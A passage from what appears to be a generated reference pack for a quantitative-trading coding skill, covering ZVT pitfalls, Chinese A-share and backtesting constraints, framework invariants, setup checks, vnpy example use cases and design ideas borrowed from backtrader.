ZVT Trader 在 load_data 完成后检查数据为空时，不提前退出，而是将空 DataFrame 传入 selector 计算，触发后续 NoneType 操作链式崩溃。错误栈深且难以定位根因， 用户误以为是策略逻辑问题。根因是数据时间窗口配置错误（start/end 不在数据 库覆盖范围内）但无有效校验。

Source: https://github.com/zvtvz/zvt/issues/187

### `AP-ZVT-183B` — HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移 <sub>(high)</sub>

ZVT 提供 Stock1dKdata（不复权）、Stock1dHfqKdata（后复权）、Stock1dQfqKdata （前复权）三张独立表。用户在计算价格动量/均线因子时混用两张表（如用不复权 做均线，用后复权做收益率），导致除权日前后因子值产生跳变。ZVT 不做跨表 复权类型一致性校验，混用静默通过。

Source: https://github.com/zvtvz/zvt/issues/183

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-081--vnpy
**Scan date**: 2026-04-22
**Stats**: {'total_files': 10, 'total_classes': 45, 'total_functions': 0, 'total_stages': 10}

## Modules (10)

- [event-driven_core](components/event-driven_core.md): 6 classes
- [market_data_gateway](components/market_data_gateway.md): 4 classes
- [order_management_system](components/order_management_system.md): 4 classes
- [alpha_research_data_pipeline](components/alpha_research_data_pipeline.md): 4 classes
- [alpha_modeling](components/alpha_modeling.md): 4 classes
- [alpha_strategy_backtesting](components/alpha_strategy_backtesting.md): 6 classes
- [persistence_layer](components/persistence_layer.md): 4 classes
- [rpc_communication](components/rpc_communication.md): 5 classes
- [charting_&_visualization](components/charting_-_visualization.md): 4 classes
- [ui_application_layer](components/ui_application_layer.md): 4 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 134
  fatal_constraints_count: 38
  non_fatal_constraints_count: 169
  use_cases_count: 21
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

## Domain Constraints Injected (71)

- **`SHARED-CN-ASTOCK-T1-001`** <sub>(fatal)</sub>: A 股股票实行 T+1 交收制度：T 日买入的股票最早 T+1 日方可卖出。 T 日卖出所得资金可当日再用于买入。回测框架若未施加 T+1 持仓锁定， 将高估换手率与策略胜率，尤其损害日内反转类策略的真实性。
- **`SHARED-CN-ASTOCK-T1-002`** <sub>(fatal)</sub>: 沪深主板股票日涨跌幅上限为 ±10%（ST/SST 股票 ±5%）。 涨停封板时买方消失、跌停封板时卖方消失；回测若假设当日可以任意价格 成交，会系统性高估可执行性。封板检测应在成交模拟层强制实施。
- **`SHARED-CN-ASTOCK-T1-003`** <sub>(high)</sub>: 科创板和创业板（2020年8月改革后）正常交易日涨跌幅为 ±20%； 北交所 ±30%；新股上市后前5个交易日不设涨跌幅限制。 回测若对所有股票统一套用 ±10% 过滤逻辑，会错误剔除或错误包含这些板块的成交。
- **`SHARED-CN-ASTOCK-T1-004`** <sub>(high)</sub>: ST/*ST 股票日涨跌幅限制为 ±5%，流动性极差，成交假设不可与正常股票混用。 包含历史 ST 股票（最终退市）但不纳入回测会产生幸存者偏差； 纳入回测但不区分 ST 涨跌幅会错误模拟成交。
- **`SHARED-CN-ASTOCK-T1-005`** <sub>(medium)</sub>: A 股开盘集合竞价（9:15-9:25）和收盘集合竞价（14:57-15:00）期间， 成交价由"最大成交量原则"确定，非即时撮合。回测以开盘价或收盘价假设 即时全量成交会低估实际滑点风险，大单策略尤为明显。
- **`SHARED-CN-ASTOCK-T1-006`** <sub>(high)</sub>: 停牌制度：A 股长期停牌（2018年前可长达数月）期间，持仓资金被锁定， 无法再平衡，机会成本在回测中普遍被忽略。应在因子计算前过滤停牌日 （volume == 0 或 is_suspended == True），停牌期间不发出信号。
- **`SHARED-CN-ASTOCK-T1-007`** <sub>(high)</sub>: 新股上市后前5个交易日无涨跌幅限制（首日涨幅可超300%）， 且无完整历史数据（均线/波动率/换手率因子无法计算）。 应在因子计算前过滤上市不足 N 个交易日（通常 60-252 日）的股票。
- **`SHARED-CN-ASTOCK-T1-008`** <sub>(high)</sub>: A 股程序化交易监管新规（2025年7月7日施行）：单账户每秒申报/撤单 ≥ 300 笔， 或单日申报/撤单 ≥ 20000 笔，被认定为高频交易，须向交易所报备。 AI 生成的量化策略若频率超标则无法合规运行，应在策略设计期提示。
- **`SHARED-CN-ASTOCK-ADJ-001`** <sub>(fatal)</sub>: 除权除息日股价跳空是账面调整而非真实亏损。复权选择： 不复权会虚增策略亏损；前复权会将历史价格内嵌未来分红信息（lookahead bias）； 后复权以上市首日为基准累积，是量化回测的最优选择。
- **`SHARED-CN-ASTOCK-ADJ-002`** <sub>(fatal)</sub>: A 股上市公司财务报告披露有法定延迟：年报在次年4月30日前、 半年报在8月31日前、季报分别在4月30日（一季）/10月31日（三季）前披露。 回测中使用财务数据时，必须以实际披露日期（announcement_date）而非 会计期间结束日作为数据可用时间点，否则引入 point-in-time lookahead bias。
- **`SHARED-CN-ASTOCK-ADJ-003`** <sub>(high)</sub>: 分红送股转增和配股会导致除权除息日后股本增加，历史持股数量不变但股价等比 缩水，若回测系统未同步调整持仓股数，会在除权日产生虚假亏损或盈利。
- **`SHARED-CN-ASTOCK-ADJ-004`** <sub>(medium)</sub>: 大宗交易与竞价交易价差：大宗交易成交价可比市价折价最多 10%（主板）， 但此价格不影响次日竞价开盘。大宗交易数据出现在收盘后，若将其混入 日内 OHLCV 数据，会污染收盘价和成交量的正常计算。
- **`SHARED-CN-ASTOCK-ADJ-005`** <sub>(fatal)</sub>: 融资融券（两融）做空限制：A 股散户无法直接卖空，融券标的池有限（主要为 大盘蓝筹，中小盘融券极度稀缺），融券利率远高于融资利率。 回测若直接假设可做空任意股票，会产生不可执行的策略，实盘与回测严重背离。
- **`SHARED-CN-ASTOCK-FX-001`** <sub>(high)</sub>: 通过沪深港通（北向）买入股票，境外投资者合计持股上限 30%，预警线 28%。 当外资持股比例达 28% 时，联交所暂停该股新增买盘，直到降至 26% 才恢复。 策略若重仓外资偏好股（消费/医药龙头），需监控外资持股比例。
- **`SHARED-CN-ASTOCK-FX-002`** <sub>(high)</sub>: 5% 举牌规则：单一投资者持有上市公司已发行股份超过 5%，须在3日内向证监会 和交易所报告并公告；在此期间及公告后2日内不得再买卖。 量化选股系统若不考虑此规则，重仓股超过 5% 阈值后将面临强制停止买入。
- **`SHARED-CN-ASTOCK-FX-003`** <sub>(high)</sub>: 公募基金"双十原则"：单基金持有单只股票不超过净资产 10%， 同一基金管理人旗下所有基金合计不超过该公司已发行股份 10%。 量化选股组合若部署于公募基金，需在优化约束中强制加入合规上限。
- **`SHARED-CN-ASTOCK-FX-004`** <sub>(fatal)</sub>: 内幕交易边界：AI 辅助量化系统的所有输入数据必须来自公开已披露信息。 通过非公开渠道（私有数据服务/内部消息/重组前预知）触发的自动化交易 构成内幕交易，适用《证券法》第80-83条及《内幕交易行为认定指引》。
- **`SHARED-CN-ASTOCK-MKT-001`** <sub>(fatal)</sub>: 幸存者偏差：使用当前 A 股成分股（如当前沪深300）作为历史回测股票池， 会遗漏曾被纳入指数但因业绩差被调出或退市的股票。2020-2024年 A 股 退市数量加速（41家/年创纪录），此偏差日趋严重。必须使用历史时点快照。
- **`SHARED-CN-ASTOCK-MKT-002`** <sub>(medium)</sub>: 指数成分股调整效应：沪深300/中证500等每半年调整一次（6月/12月）， 被纳入股票通常在公告日至生效日之间显著上涨（被动资金被动买入）， 被剔除股票则相反。回测股票池应使用历史成分股快照，并标注调整窗口期。
- **`SHARED-CN-ASTOCK-MKT-003`** <sub>(high)</sub>: 策略拥挤（Strategy Crowding）：大量量化私募使用相似因子模型时， 持仓高度重叠，遇市场冲击时集体卖出形成踩踏。2024年2月 A 股量化危机 是典型案例（小盘股指数单日跌幅超 10%）。需监控因子多头持仓与 主流量化基金的重叠率。
- **`SHARED-CN-ASTOCK-MKT-004`** <sub>(high)</sub>: A 股量化对冲策略常用 IF/IC/IM 股指期货做多/空对冲系统性风险。 但 A 股股指期货长期处于贴水（远期价格 < 现货），IC 年化贴水可达 10-20%。 回测若仅考虑价格收益而忽略期货贴水/升水，会严重高估对冲策略净收益。
- **`SHARED-CN-ASTOCK-MKT-005`** <sub>(high)</sub>: A 股月度动量因子在方向上与美股相反：近1个月表现最好的股票， 下1个月大概率反转（反转效应而非动量）。机构研究（华泰/东吴证券） 与学术论文均验证：直接套用美股月度动量因子在 A 股会产生系统性亏损。
- **`SHARED-CN-ASTOCK-BF-001`** <sub>(medium)</sub>: 处置效应（Shefrin & Statman 1985）在 A 股散户中尤为显著： 投资者倾向于过早卖出盈利股票、过长持有亏损股票。上交所实证研究证实 超过 90% 的个人账户存在此效应，AI 辅助工具不应迁就"持有亏损等解套" 的直觉，而应基于量化信号提供纪律性止损止盈建议。
- **`SHARED-CN-ASTOCK-BF-002`** <sub>(medium)</sub>: A 股以散户为主（个人账户交易量占比超 80%），羊群效应显著：散户倾向于 跟风操作，导致价格非理性波动（如 2015年杠杆牛熊）。量化策略应避免 使用成交量排行/热度排行等可能强化羊群信号的指标作为主要因子。
- **`SHARED-CN-ASTOCK-BF-003`** <sub>(medium)</sub>: 过度自信效应（Barber & Odean 2000）在 A 股散户中更严重：散户年均换手率 超 500%，机构长期收益显著优于散户。高换手率策略经交易成本后净收益往往 更低。AI 不应鼓励"频繁操作"，而应推荐低频高质信号驱动交易。
- **`SHARED-CN-ASTOCK-BF-004`** <sub>(medium)</sub>: A 股日历效应：春节效应（节前5日和节后1-3日倾向上涨）、月初效应 （月初第1-5个交易日表现优于月中/月末）已有学术实证（南京财经大学等）。 策略应在日历特殊窗口降低信号置信度，或单独评估日历驱动收益的贡献。
- **`SHARED-CN-ASTOCK-BF-005`** <sub>(high)</sub>: 策略容量（Capacity）限制：A 股小盘/微盘股日均成交额仅数百万， 大资金买入/卖出会造成严重价格冲击，策略实际容量可能仅几千万元。 回测结果不可外推至亿级资金，应在回测中加入成交量比例上限约束。
- **`SHARED-CN-ASTOCK-COST-001`** <sub>(fatal)</sub>: A 股完整交易成本结构（2023年8月调整后）：印花税卖出单向 0.05%； 佣金双向约 0.01%（最低5元）；过户费（沪市）0.001%； 滑点/冲击成本小盘股 0.1%-0.5%/次。忽略成本的回测策略年化收益率 具有欺骗性，高频/高换手策略尤甚。
- **`SHARED-CN-ASTOCK-COST-002`** <sub>(high)</sub>: 市场冲击成本（Market Impact）在回测中通常完全缺失，但在实盘中可能是 最大成本来源。A 股小盘股 100 万元买入可能推高 1% 以上。冲击成本与 成交规模呈幂律而非线性关系，应使用 Almgren-Chriss 模型或简化版估算。
- **`SHARED-CN-ASTOCK-COST-003`** <sub>(medium)</sub>: 大股东/董监高减持新规（证监会第224号令，2024年5月）：持股5%以上大股东 通过集中竞价减持须提前15个交易日披露减持计划，3个月内不超过股份总数1%。 解禁股减持压力是 A 股特有的系统性风险因子，回测中忽略解禁日历会低估 相关股票的持股风险。
- **`SHARED-CN-ASTOCK-DATA-001`** <sub>(high)</sub>: A 股交易日历与自然日历不一致：存在法定节假日调休导致的"补班日"（周六上班）， 以及临时停市（2015年7月8日至7月10日因股灾紧急停市）。 使用通用工作日历（weekdays）推算 A 股交易日会产生偏差， 必须使用 A 股专用交易日历（如 exchange_calendars 或 tushare 的交易日接口）。
- **`SHARED-CN-ASTOCK-DATA-002`** <sub>(medium)</sub>: A 股退市后股票代码可能被新股重用（极少见但存在）。使用纯代码（如 '000001'） 作为历史数据主键而不包含交易所后缀（'.SZ'）或上市日期范围，可能导致 历史数据与当前股票的错误混淆，长周期回测中需特别注意。
- **`SHARED-BT-LAB-001`** <sub>(fatal)</sub>: 未来函数（Lookahead Bias）：在模拟历史时间点 t 的交易决策时， 不得使用 t 时刻之后才能知道的信息。最常见形式： (1) 使用收盘价计算信号并同日以收盘价成交； (2) 将 T 日收盘后计算的指标标记在同一根 K 线； (3) 使用当日最高/最低价作为成交假设。 信号计算与成交时间必须对齐：T 日收盘后计算信号，T+1 日开盘成交。
- **`SHARED-BT-LAB-002`** <sub>(high)</sub>: 指标预热期（Warmup Period）处理：滚动窗口指标在前 N 个 bar 时 NaN， 这些 bar 不应参与信号计算和持仓决策。强制要求指标的 warmup_period 与最长 lookback 期等长，且 warmup 期间持仓应置零。
- **`SHARED-BT-LAB-003`** <sub>(fatal)</sub>: ML/DL 模型时序数据划分必须按时间顺序：TRAIN < VALID < TEST， 不可使用随机 k-fold 分折（会将未来数据混入训练集）。 应使用 TimeSeriesSplit 或 Walk-Forward 验证。
- **`SHARED-BT-LAB-004`** <sub>(fatal)</sub>: 开盘价/最高价/最低价成交假设：日线回测中假设每日可以最高价卖出或 最低价买入（如动量策略"最高价止盈"），这是明显的 lookahead， 因为日内最高/最低价只有收盘后才能确认。成交价只能用开盘价或 前一日收盘价（带滑点）。
- **`SHARED-BT-LAB-005`** <sub>(high)</sub>: 数据对齐偏移（Off-by-one）：pandas rolling/shift 等操作容易引入细微的 1 期偏移错误。应在代码中明确记录每个序列的"观测时间点"， 并通过 assert 验证关键时间对齐关系。
- **`SHARED-BT-LAB-006`** <sub>(high)</sub>: 过度优化（Overfitting）：回测数量越多，过拟合概率越高。 Bailey et al.（2014）证明 Optimal Sharpe Ratio 期望值随回测次数单调递减。 应使用 Walk-Forward 验证代替 in-sample 参数穷举，并报告 Deflated Sharpe Ratio（DSR）而非峰值 Sharpe。
- **`SHARED-BT-SURV-001`** <sub>(fatal)</sub>: 幸存者偏差（Survivorship Bias）：使用当前市场成分股作为历史回测股票池， 会遗漏曾经存在但后来退市、摘牌或被合并的股票，系统性高估策略历史收益率。 回测股票池必须使用历史时点快照（point-in-time universe）。
- **`SHARED-BT-SURV-002`** <sub>(high)</sub>: In-Sample / Out-of-Sample 划分：策略开发、参数选择必须在样本内完成， 样本外数据仅用于最终验证，不可多次"看"样本外数据后继续调优 （会将样本外变为新的样本内，重蹈过拟合）。
- **`SHARED-BT-SURV-003`** <sub>(high)</sub>: 停牌/缺失数据的填充策略：停牌日价格不可简单用前一日收盘价 forward-fill， 因为这会在复盘时造成"零成交量"日参与了因子计算和信号生成。 应在因子计算层显式过滤缺失交易日，不填充。
- **`SHARED-BT-SURV-004`** <sub>(high)</sub>: 异常值（Extreme Value）污染：原始市场数据可能含有数据源错误（如除权未 及时调整、手工录入错误导致的极端价格），不清洗直接进入因子计算会产生 极端信号，污染整个横截面。应在 pipeline 入口处过滤 3-sigma 异常值。
- **`SHARED-BT-COST-001`** <sub>(fatal)</sub>: 交易成本（佣金 + 印花税/转让税 + 过户费）必须在回测初始化时强制配置， 不可使用零成本默认值。忽略成本的回测策略绩效指标具有欺骗性， 高换手率策略尤其严重（单边往返成本往往吞噬 50%+ 的毛收益）。
- **`SHARED-BT-COST-002`** <sub>(high)</sub>: 滑点（Slippage）建模：回测若无滑点，假设每笔订单以理想价格成交， 高频策略在实盘中会因成交价劣化而产生严重亏损。至少应配置固定点差 或比例滑点；大单应使用成交量比例模型（如不超过日成交量 5%）。
- **`SHARED-BT-COST-003`** <sub>(high)</sub>: 换手率（Turnover）必须在回测绩效报告中展示并与成本关联分析。 月换手率超过 50%（年化 600%+）时，策略净收益对成本假设极度敏感， 每 10bps 成本变化可能改变策略盈亏结论，必须做成本敏感性分析。
- **`SHARED-BT-COST-004`** <sub>(medium)</sub>: 仓位规模化（Position Sizing）必须纳入资金量约束：回测应模拟固定资金量 下的实际持仓股数（取整），而非假设可以持有小数股。 对小盘股，最小交易单位（A股：100股/手）会导致实际可持仓量与目标权重 产生偏差，应在回测中模拟取整效应。
- **`SHARED-BT-TIME-001`** <sub>(high)</sub>: 时间戳时区统一：多数据源合并时，UTC vs 本地时间混用是常见数据腐败源。 所有时间戳必须在 pipeline 入口处统一转换为同一时区（推荐 UTC 存储， 市场本地时区展示），不可在 pipeline 中途混用不同时区。
- **`SHARED-BT-TIME-002`** <sub>(high)</sub>: 交易日历对齐：合并不同市场或不同频率数据时（如日线价格 + 周频因子）， 必须使用明确的交易日历进行 reindex/merge，不可使用 outer join 后 fillna， 否则会在非交易日（节假日）创建虚假数据行。
- **`SHARED-BT-TIME-003`** <sub>(high)</sub>: 增量更新边界校验：历史数据增量更新时，必须从数据库查询已存最新日期， 仅下载该日期之后的数据。若重新下载已有数据并追加，会产生时间戳重复行， 导致回测时序错误。更新前后必须校验无重复 (index.duplicated().any() == False)。
- **`SHARED-BT-TIME-004`** <sub>(medium)</sub>: 回测绩效归因失真：基准（Benchmark）选择不当会使 Alpha/Beta 计算失真。 应选用策略实际可投资的被动基准（如 HS300 ETF），而非不可直接投资的 价格指数（如 HS300 指数）。价格指数不含股息再投资，会低估持仓基准收益。
- **`SHARED-BT-PERF-001`** <sub>(medium)</sub>: 最大回撤（Max Drawdown）计算必须使用净值序列（portfolio value）， 不可用累计收益率序列代替。若使用对数收益率累加，会低估回撤深度 （因对数收益率在下跌时会比简单收益率偏小）。
- **`SHARED-BT-PERF-002`** <sub>(medium)</sub>: Sharpe Ratio 年化化约定：年化 Sharpe = 日 Sharpe × sqrt(252)（股票，252 交易日） 或 × sqrt(365)（加密货币，365日）。不同系统默认不同，跨系统对比前必须 确认年化因子，否则 Sharpe 不可比。
- **`SHARED-BT-PERF-003`** <sub>(medium)</sub>: Calmar Ratio / Sortino Ratio 优于 Sharpe Ratio 作为风险调整收益指标： Sharpe 假设收益正态分布，A 股/加密市场的收益分布显著左偏（肥尾）， 会低估下行风险。量化评估应同时报告 Sortino（仅下行波动）和 Calmar（年化收益/最大回撤），不应单一依赖 Sharpe。
- **`SHARED-BT-PERF-004`** <sub>(medium)</sub>: 回测绩效归因应拆解为：alpha（主动收益）、beta（市场收益）、 因子暴露收益（style/sector）和特异性收益（stock selection）。 不做归因的回测无法区分"策略优秀"与"顺风行情恰好 beta 对了"。
- **`SHARED-FR-IC-001`** <sub>(high)</sub>: IC（信息系数）是衡量因子预测能力的核心指标，定义为因子值与 下期收益率的 Spearman 秩相关系数（ICIR = IC / std(IC)）。 IC 绝对值 > 0.05 视为有预测能力的初步证据，ICIR > 0.5 视为稳定。 不计算 IC 直接报告回测绩效是因子有效性证明缺失的典型问题。
- **`SHARED-FR-IC-002`** <sub>(high)</sub>: IC 衰减（IC Decay）分析：因子预测能力通常随持仓期增长而衰减。 应计算 1/5/10/20 日 IC 序列，识别因子的最优持仓期。 IC 在1日高但20日迅速衰减的因子是短期因子，不适合月度换仓策略； 反之亦然。使用错误的持仓期会严重损害因子实盘表现。
- **`SHARED-FR-IC-003`** <sub>(high)</sub>: Harvey, Liu & Zhu (2016) 警告：学术界已发现 300+ 个"显著"因子， 其中大量是多重检验下的误发现（False Discovery）。因子有效性要求： t-stat > 3.0（而非传统的 1.96）；或在不同时段/市场独立复现； 或有清晰的经济学逻辑。不满足上述条件的因子极可能是数据挖掘产物。
- **`SHARED-FR-IC-004`** <sub>(high)</sub>: 因子换手率（Factor Turnover）控制：高 IC 但高换手率的因子，在扣除 交易成本后净 IC 可能为负。应计算换手率调整后的有效 IC： net_IC = IC - turnover × cost_per_turn。目标换手率 ≤ 50%（月频）。
- **`SHARED-FR-IC-005`** <sub>(medium)</sub>: 因子衰减期（Half-life）是因子信号强度的核心参数，直接决定最优再平衡频率。 半衰期 < 5 日：日频或周频换仓；5-20 日：周频或双周；> 20 日：月频换仓。 错误地对短期因子使用月频换仓，会导致大量 alpha 在持仓期内消散。
- **`SHARED-FR-NEUT-001`** <sub>(high)</sub>: 行业中性化（Industry Neutralization）：因子值若不对行业均值中性化， 因子收益中会混入行业轮动收益，难以判断是因子本身还是行业暴露驱动了收益。 行业中性化操作：factor_neutral = factor - industry_mean(factor)。
- **`SHARED-FR-NEUT-002`** <sub>(high)</sub>: 市值中性化（Market Cap Neutralization）：小盘股效应（小盘跑赢大盘） 是金融史上最持久的 anomaly 之一，会污染几乎所有未中性化的因子。 若因子与市值高度相关，选股会系统性偏向小盘，收益来自市值暴露而非因子本身。 需同时进行行业和市值中性化（Fama-MacBeth 回归或残差法）。
- **`SHARED-FR-NEUT-003`** <sub>(high)</sub>: 异常值处理（Winsorize/MAD）：因子原始值通常含有极端值，极端值会扭曲 分组分析（如 Q1/Q10 十分位）。应对原始因子值做 Winsorize（截尾至 [1%, 99%] 或 3-sigma）或 MAD（中位数绝对偏差）缩尾，然后再排名/中性化。
- **`SHARED-FR-NEUT-004`** <sub>(medium)</sub>: 因子正交化（Factor Orthogonalization）：当多个因子共同用于合成打分时， 高相关因子的合成等效于对单一因子过度权重，稀释信号多样性。 应在合成前对因子做施密特正交化或 PCA，消除因子间的多重共线性。
- **`SHARED-FR-NEUT-005`** <sub>(medium)</sub>: 缺失数据填充策略：因子计算中的 NaN（停牌/新股/数据缺口）若用截面均值填充 会引入 lookahead bias（均值本身含未来信息）；若完全删除会产生幸存者偏差； 正确做法是用截面中位数（当日所有股票的中位数，不依赖未来）或将该股当日排除。
- **`SHARED-FR-PORT-001`** <sub>(high)</sub>: 分层分析（Quantile Analysis）：因子评估应使用 Q1/Q5（五分位）或 Q1/Q10（十分位）分组的多空收益差（top minus bottom spread）作为 主要评估指标，而非简单的多头收益。Q1 多 Q5 空的"单调性"检验是 因子有效性的核心证据：单调递增/递减 > 非单调 >> 仅多头有效。
- **`SHARED-FR-PORT-002`** <sub>(medium)</sub>: Alpha 衰减测试（Alpha Decay Test）：因子的月度 IC 在不同时段（牛市/熊市/ 震荡市）的稳定性是因子鲁棒性的重要证据。IC 仅在某个特定市场状态下有效 的因子不适合全天候部署；应分段（rolling 12M）展示 IC 时序， 识别因子失效期。
- **`SHARED-FR-PORT-003`** <sub>(medium)</sub>: 换仓成本感知（Turnover-Aware Selection）：因子排名靠近中间地带（49-51 分位） 的股票，排名小幅波动就会触发换仓，产生大量无效交易成本。 应在选股时设置换仓缓冲区（buffer zone）：只在排名变化超过阈值时才换仓。
- **`SHARED-FR-PORT-004`** <sub>(medium)</sub>: 分组收益的统计显著性（Bootstrap 检验）：因子分层收益差（Q1-Q5 spread） 即使在历史数据上很大，也可能是偶然，需要 bootstrap 或 t-test 检验 显著性（p-value < 0.05）。小样本回测期（< 3年）的分层收益尤其不可靠。
- **`SHARED-FR-XFER-001`** <sub>(high)</sub>: 因子跨市场可移植性验证：在一个市场有效的因子，不必然在另一个市场有效。 将美股因子直接套用 A 股、或将股票因子套用期货/加密货币，需要独立 IC 验证， 不可假设跨市场通用性。A 股特有异象（如反转效应、ST 价格异常）不存在于美股。
- **`SHARED-FR-XFER-002`** <sub>(medium)</sub>: 因子有效性时间稳定性：曾经有效的因子会因市场学习和套利行为逐渐失效 （McLean & Pontiff 2016 证明因子发表后平均衰减 58%）。 应定期（每季度/年）重新评估因子 IC，失效因子应及时替换或降权。
- **`SHARED-FR-XFER-003`** <sub>(medium)</sub>: 因子与宏观经济环境的交互：利率周期/经济周期/市场情绪对因子有效性影响显著。 价值因子（低 P/B）在利率上升期更有效；动量因子在趋势市更有效，震荡市失效。 部署因子前应评估当前宏观环境与因子最优生存环境的匹配度。

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **21**

## `KUC-101`
**Source**: `examples/alpha_research/download_data_rq.ipynb`

Download historical CSI300 index constituent stock data from RQData data service for use in alpha factor research and backtesting.

## `KUC-102`
**Source**: `examples/alpha_research/download_data_xt.ipynb`

Download historical CSI300 index constituent stock data from XTQuant data service for use in alpha factor research.

## `KUC-103`
**Source**: `examples/alpha_research/research_workflow_alpha101.ipynb`

Conduct alpha factor research using the Alpha101 factor library to discover predictive signals in CSI300 constituent stocks.

## `KUC-104`
**Source**: `examples/alpha_research/research_workflow_lasso.ipynb`

Develop and test alpha factors using Lasso regression with Alpha158 dataset for feature selection and regularization in stock prediction.

## `KUC-105`
**Source**: `examples/alpha_research/research_workflow_lgb.ipynb`

Build and evaluate alpha factors using LightGBM gradient boosting with Alpha158 dataset for stock return prediction.

## `KUC-106`
**Source**: `examples/alpha_research/research_workflow_mlp.ipynb`

Develop and test alpha factors using multi-layer perceptron neural network with Alpha158 dataset for non-linear pattern recognition in stock data.

## `KUC-107`
**Source**: `examples/candle_chart/run.py`

Visualize historical price data with candlestick charts and volume bars for market analysis and strategy review.

## `KUC-108`
**Source**: `examples/client_server/run_client.py`

Set up a VeighNa client instance connected to an RPC server for distributed CTA strategy execution.

## `KUC-109`
**Source**: `examples/client_server/run_server.py`

Configure a VeighNa server with CTP gateway and RPC service for handling trading requests from remote clients.

## `KUC-110`
**Source**: `examples/cta_backtesting/backtesting_demo.ipynb`

Backtest ATR RSI trading strategy on futures contracts to evaluate performance metrics and optimize parameters.

## `KUC-111`
**Source**: `examples/cta_backtesting/portfolio_backtesting.ipynb`

Backtest multiple CTA strategies simultaneously to evaluate portfolio-level performance and diversification benefits.

## `KUC-112`
**Source**: `examples/data_recorder/data_recorder.py`

Connect to futures exchanges via CTP interface and automatically record real-time market data to database.

## `KUC-113`
**Source**: `examples/download_bars/download_bars.ipynb`

Download historical bar data for futures contracts from data service providers for backtesting and analysis.

## `KUC-114`
**Source**: `examples/no_ui/run.py`

Run CTA strategy execution without graphical UI, connecting directly to CTP for automated futures trading.

## `KUC-115`
**Source**: `examples/notebook_trading/demo_notebook.ipynb`

Execute trading operations interactively from Jupyter notebook using script trader for quick strategy testing and manual trading.

## `KUC-116`
**Source**: `examples/portfolio_backtesting/backtesting_demo.ipynb`

Backtest portfolio strategies like pair trading on multiple futures contracts to evaluate spread-based trading opportunities.

## `KUC-117`
**Source**: `examples/simple_rpc/test_client.py`

Test and demonstrate RPC client functionality for distributed system communication and remote procedure calls.

## `KUC-118`
**Source**: `examples/simple_rpc/test_server.py`

Test and demonstrate RPC server functionality for handling remote client requests and publishing data updates.

## `KUC-119`
**Source**: `examples/spread_backtesting/backtesting.ipynb`

Backtest statistical arbitrage strategies trading spreads between related futures contracts to identify mean reversion opportunities.

## `KUC-120`
**Source**: `examples/veighna_trader/demo_script.py`

Execute custom trading scripts for basket orders, hedging strategies, cross-exchange arbitrage, and market monitoring.

## `KUC-121`
**Source**: `examples/veighna_trader/run.py`

Launch VeighNa Trader desktop application with CTP gateway for futures trading and data management capabilities.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **10**

## `CW-BT-001` — Cerebro 统一编排引擎
**From**: backtrader · **Applicable to**: backtesting

backtrader 用 Cerebro 作为单一入口，统一管理 data feeds、strategies、analyzers、 observers 的生命周期，支持一次 cerebro.run() 跑多策略+多数据源。 zvt 的 StockTrader 目前每次实例化只绑定一套因子，缺乏统一的多策略组合编排层； 借鉴 Cerebro 模式可让用户把多个 Trader 实例组合到一个 runner 中对比评估。

## `CW-BT-002` — Analyzer 插件化绩效评估
**From**: backtrader · **Applicable to**: backtesting

backtrader 提供 SharpeRatio、DrawDown、TimeReturn、TradeAnalyzer 等即插即用 的 Analyzer，可在不修改策略代码的情况下附加任意绩效指标。 zvt 当前绩效评估能力较弱，没有标准化的 Analyzer 接口； 借鉴此模式可让用户 cerebro.addanalyzer(SharpeRatio) 即得风险调整收益报告。

## `CW-BT-003` — Sizer 仓位管理分离
**From**: backtrader · **Applicable to**: backtesting

backtrader 将仓位管理（每次开仓买多少股/多大比例）单独抽象为 Sizer， 与信号逻辑完全解耦；内置 FixedSize、PercentSizer 等，用户可自定义。 zvt 目前没有显式的 Sizer 概念，仓位控制逻辑散落在 Trader.on_profit_control 等钩子中； 引入 Sizer 接口可使策略信号与资金管理规则独立演化和组合复用。

